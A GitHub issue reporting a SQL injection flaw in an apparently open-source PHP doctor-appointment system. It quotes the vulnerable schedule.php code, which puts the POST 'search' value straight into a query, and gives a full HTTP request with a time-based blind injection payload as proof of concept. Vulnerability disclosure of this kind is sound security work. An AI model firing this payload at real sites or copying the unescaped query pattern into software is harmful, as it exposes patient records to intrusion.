Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Found a vulnerability #20

Open
0clickjacking0 opened this issue Aug 6, 2022 · 0 comments
Open

Found a vulnerability #20

0clickjacking0 opened this issue Aug 6, 2022 · 0 comments
Labels
sql-injection

Comments

@0clickjacking0
Copy link

Vulnerability file address

patient/schedule.php from line 117,The $keyword parameter is controllable, the parameter search can be passed through post, and the $keyword is not protected from sql injection, line 133 $result= $database->query($sqlmain) causes sql injection

......
......
......
if($_POST){
                        //print_r($_POST);
                        
                        if(!empty($_POST["search"])){
                            
                            $keyword=$_POST["search"];
                            $sqlmain= "select * from schedule inner join doctor on schedule.docid=doctor.docid where schedule.scheduledate>='$today' and (doctor.docname='$keyword' or doctor.docname like '$keyword%' or doctor.docname like '%$keyword' or doctor.docname like '%$keyword%' or schedule.title='$keyword' or schedule.title like '$keyword%' or schedule.title like '%$keyword' or schedule.title like '%$keyword%' or schedule.scheduledate like '$keyword%' or schedule.scheduledate like '%$keyword' or schedule.scheduledate like '%$keyword%' or schedule.scheduledate='$keyword' )  order by schedule.scheduledate asc";
                            //echo $sqlmain;
                            $insertkey=$keyword;
                            $searchtype="Search Result : ";
                            $q='"';
                        }

                    }


                $result= $database->query($sqlmain)
......
......
......

POC

POST /patient/schedule.php HTTP/1.1
Host: www.edoc.net
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:94.0) Gecko/20100101 Firefox/94.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 8
Origin: http://www.edoc.net
Connection: close
Referer: http://www.edoc.net/patient/schedule.php
Cookie: PHPSESSID=4ciqg01m5iftqio69u3m5sha12
Upgrade-Insecure-Requests: 1

search=1' AND SLEEP(5) AND 'tklr'='tklr

Attack results pictures

image-20220806105109131
theunknownsky added a commit to amiel-danao/veterinary-appointment-system that referenced this issue Jul 21, 2023
@theunknownsky
done task HashenUdara#20, HashenUdara#23, HashenUdara#24, HashenUdara#25
16bc1ec
theunknownsky added a commit to amiel-danao/veterinary-appointment-system that referenced this issue Jul 21, 2023
@theunknownsky
done task HashenUdara#20, HashenUdara#23, HashenUdara#24, HashenUdara#25
f6b24a2
theunknownsky added a commit to amiel-danao/veterinary-appointment-system that referenced this issue Jul 22, 2023
@theunknownsky
actually done task HashenUdara#20
c65eae4
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
sql-injection
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
2 participants
@0clickjacking0 @HashenUdara